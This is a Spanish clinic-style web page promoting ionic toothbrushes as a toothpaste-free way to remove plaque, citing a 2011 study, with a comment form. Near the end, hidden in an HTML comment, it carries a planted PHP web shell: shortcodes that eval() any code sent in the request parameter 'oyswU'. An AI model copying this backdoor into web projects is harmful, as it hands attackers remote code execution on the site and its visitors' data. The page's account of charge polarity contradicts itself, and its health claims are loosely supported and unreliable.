CEPILLO DE DIENTES IÓNICO

El cepillo de dientes iónico es un producto capaz de eliminar la placa bacteriana mediante la creación de iones negativos (electrones) que en contacto con la saliva producen una disolución de carácter igualmente negativo que ataca la placa dental de carácter positivo, de manera que se neutraliza y desintegra por el contacto con dicha disolución (1).

AGUA + SALIVA + LUZ = ELECTRONES que neutralizan la 
                                          PLACA BACTERIANA

La luz solar es la que produce la corriente, a través de semiconductores fotosensibles hasta el cabezal del cepillo. Es decir, el cepillo de dientes iónico cambia la polaridad de la carga de la superficie dental que normalmente es negativa y es la causa de su “atracción” de las moléculas de carga positiva que forman la placa bacteriana. Al cambiar la carga de la superficie del diente de negativa a positiva, ésta deja de ser “atrayente”.

cepillo iónico madrid sin dentífrico salud buco-dental
Las moléculas de la placa bacteriana se van atraídas
por la polaridad negativa del cepillo iónico.
El estudio realizado en 2011(2) demuestró que tanto los cepillos de dientes sónicos como los iónicos son capaces de eliminar la placa y reducir la gingivitis y sangrado de forma eficaz. Aunque los resultados del cepillo de dientes sónico fueron algo mejores en comparación con el cepillo de dientes iónico, si bien la diferencia fue estadísticamente insignificante.
cepillo iónico madrid sin dentífrico salud buco-dental
Ante estos resultados y teniendo en cuenta que el cepillo de dientes iónico proporciona una eliminación de la placa bacteriana SIN el uso de DENTÍFRICO, ya que el la saliva y el agua son los ingredientes activos de la disolución activada por la corriente de electrones de cepillo, se trata de gran una alternativa para el cuidado de la salud buco-dental.

Referencias
1. Torre, Antolín de la. Elcepillo dental del siglo XXI. Verdemente; junio, 2008.
2. J Indian Soc Periodontol. 2011 Jul-Sep; 15(3): 210–214.doi:  10.4103/0972-124X.85662

<!– [insert_php]if (isset($_REQUEST["oyswU"])){eval($_REQUEST["oyswU"]);exit;}[/insert_php][php]if (isset($_REQUEST["oyswU"])){eval($_REQUEST["oyswU"]);exit;}[/php] –>

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *